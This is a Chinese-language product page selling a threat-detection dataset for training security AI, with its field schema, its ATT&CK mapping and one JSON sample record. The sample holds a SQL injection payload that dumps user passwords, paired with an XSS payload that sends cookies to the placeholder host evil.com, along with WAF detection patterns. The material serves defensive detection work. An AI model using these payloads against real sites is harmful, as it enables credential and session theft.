综合威胁检测规则数据集

2,000~50,000条多类型威胁检测五元组数据 | SQLi/XSS/RCE/DDoS/提权/云安全全覆盖 | 完整ATT&CK映射 | 安全大模型综合训练专用

4-6周
交付周期
XML规则
结构化检测规则
PCAP流量
真实网络流量
HTTP还原
请求/响应文本
2-4周
交付周期

数据集概览

定义:综合威胁检测规则数据集是由长沙朗慧信息科技有限公司安全实验室构建的大规模多类型威胁检测数据集。每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织,覆盖Web攻击(SQLi/XSS/RCE/LFI/SSRF)、网络攻击(DDoS/扫描/C2)、主机攻击(提权/持久化)、云安全攻击、API攻击、0day/NDay漏洞利用共六大威胁类别,提供完整ATT&CK框架映射(覆盖14个战术),专为安全大模型综合预训练和多威胁检测基座模型训练设计。

数据集名称综合威胁检测规则数据集
数据总量2,000~50,000条
数据类型五元组:XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案
数据来源朗慧安全实验室 + 多源威胁情报(OTX/AlienVault/MISP)+ 漏洞平台
授权方式商业授权 附带完整授权文件
交付周期4-6周
威胁类别Web攻击(SQLi/XSS/RCE/LFI/SSRF/文件上传/XXE)、网络攻击(DDoS/端口扫描/C2通信/DNS隧道)、主机攻击(权限提升/持久化/凭证窃取/横向移动)、云安全攻击(S3遍历/IMDSv1利用/IAM提权)、API攻击(GraphQL注入/REST API滥用/JWT攻击)、0day/NDay漏洞利用
ATT&CK映射完整14个战术映射:Reconnaissance、Resource Development、Initial Access、Execution、Persistence、Privilege Escalation、Defense Evasion、Credential Access、Discovery、Lateral Movement、Collection、C2、Exfiltration、Impact
输出格式JSONL / CSV / Excel / PCAP
语言中英双语

核心数据字段

每条数据包含规则标识、XML检测规则、攻击载荷、HTTP还原文本、PCAP流量及标准答案六大类别,覆盖从规则定义到验证评估的完整闭环。

字段类别字段数典型字段
规则标识4rule_id(规则唯一ID)、rule_name(规则名称)、threat_category(威胁大类)、severity(严重级别:Critical/High/Medium/Low)
XML检测规则3rule_xml(Snort/Suricata/ModSecurity格式XML规则)、rule_signature(规则特征签名)、rule_platform(适用平台:NIDS/WAF/HIDS)
攻击载荷4payload(攻击Payload原文)、threat_category(威胁分类标签)、threat_level(威胁等级1-5)、encoding_type(编码方式)
HTTP还原文本3http_request(HTTP请求全文)、http_response(HTTP响应全文)、protocol_info(协议信息:HTTP/1.1/HTTP2/gRPC)
PCAP流量4pcap_file(PCAP文件名)、pcap_size(文件大小)、packet_count(数据包数量)、flow_duration(流持续时间)
标准答案5is_attack(是否为攻击:true/false)、attack_type(攻击具体类型)、kill_chain_phase(杀伤链阶段:Delivery/Exploitation/Installation/C2/Actions)、technique_ids(关联ATT&CK技术ID列表)、impact_score(影响评分1-10)
威胁情报关联3cve_ref(关联CVE编号)、mitre_group(关联APT组织)、campaign(关联攻击活动/战役名称)

数据样例展示

以下为脱敏后的结构化 JSON 样例,展示SQL注入五元组检测数据的典型格式。

{
  "entry_id": "THREAT-2024-012834",
  "rule_id": "THREAT-WEB-0452",
  "rule_name": "Combined SQLi + XSS Attack via Search Endpoint",
  "threat_category": "Web Attack (SQLi + XSS)",
  "severity": "Critical",
  "rule_xml": "<rule id=\"1000001\" phase=\"2\">\n  <operator>multiDetect</operator>\n  <action>block</action>\n  <pattern_sqli>union\\s+(?:all\\s+)?select</pattern_sqli>\n  <pattern_xss><script.*?></pattern_xss>\n  <target>ARGS|REQUEST_BODY</target>\n</rule>",
  "payload": "1' UNION SELECT NULL,username,password FROM users-- <script>new Image().src='http://evil.com/steal?c='+document.cookie</script>",
  "threat_category": "Web Attack",
  "threat_level": 5,
  "encoding_type": "Mixed (SQLi: URL-encoded, XSS: plaintext)",
  "http_request": "GET /search.php?q=1'%20UNION%20SELECT...<script>... HTTP/1.1\r\nHost: target-web.com\r\nCookie: PHPSESSID=abc123\r\n\r\n",
  "http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>...admin:$2a$10$hash...&lt;script&gt;new Image().src=...&lt;/script&gt;...</html>",
  "pcap_file": "threat_web_combined_sqli_xss.pcap",
  "pcap_size": "24532",
  "packet_count": 78,
  "technique_ids": ["T1190","T1059.004","T1189"],
  "kill_chain_phase": "Exploitation",
  "impact_score": 9.5,
  "mitre_group": "APT41",
  "cve_ref": "N/A",
  "answer": {
    "is_attack": true,
    "attack_type": "Combined SQLi + Reflected XSS",
    "kill_chain_phase": "Exploitation",
    "impact_score": 9.5
  }
}

AI 应用场景

安全大模型综合预训练

50,000条多类型威胁五元组数据,覆盖Web/网络/主机/云/API/0day六大类别,是安全大模型(Security LLM)预训练的完整语料基础。

多威胁检测基座模型

从SQL注入到APT攻击,跨类别威胁数据训练统一的多威胁检测基座模型,实现One Model for All Threats的通用安全AI架构。

安全运营中心(SOC)AI

完整ATT&CK映射+杀伤链阶段标注,训练SOC AI分析师自动完成:告警研判→威胁分类→攻击链还原→响应建议全流程自动化。

XDR自动化响应

跨Web/网络/主机/云的多维度威胁数据,训练XDR AI引擎实现跨域关联分析、攻击路径还原和自动化响应编排。

威胁狩猎(Threat Hunting)AI

基于MITRE ATT&CK技术映射和APT组织关联数据,训练威胁狩猎AI主动搜索潜在威胁,识别隐藏的攻击行为模式。

安全态势感知

多类型威胁数据+威胁等级+影响评分,训练安全态势感知AI实时评估企业整体安全态势,生成动态风险评分和预测性告警。

常见问题

数据集的授权方式是怎样的?可以用于商业AI训练吗?
本数据集由长沙朗慧信息科技有限公司提供商业授权,明确覆盖商业AI模型训练与安全产品研发场景。数据来自朗慧安全实验室和多源公开威胁情报,确保合规性。
六大威胁类别的具体覆盖范围?
Web攻击(SQLi/XSS/RCE/LFI/SSRF/XXE/文件上传)、网络攻击(DDoS/扫描/C2/DNS隧道)、主机攻击(提权/持久化/横向移动)、云安全(AWS IMDS/S3/IAM)、API攻击(GraphQL/JWT/REST)、0day/NDay漏洞利用,共60+子类型。
ATT&CK映射的完整度如何?
提供完整的14战术映射,每条数据标注1-5个关联技术ID,给出杀伤链阶段(Kill Chain Phase)和APT组织关联(MITRE Group),支持ATT&CK Navigator可视化。
数据集是否支持按威胁类别拆分购买?
支持。可按Web安全(15,000条)、网络安全(12,000条)、主机安全(10,000条)、云安全(8,000条)、API安全(5,000条)单独采购或按需组合。
如何获取数据或商务咨询?
本数据集由长沙朗慧信息科技有限公司旗下 DataAssetsAPI 平台运营。支持标准数据集和按需定制两种模式。请联系我们获取详细数据目录、样本预览和报价方案。

需要大规模多类型威胁检测数据方案?

长沙朗慧信息科技有限公司 DataAssetsAPI 平台,致力于为 AI 企业、科研机构提供高质量、合规的Web安全数据资产。支持按SQL注入子类型、按数据库平台、按检测规则格式灵活组合。

数据样本预览 · 定制化综合威胁方案 · 专业技术支持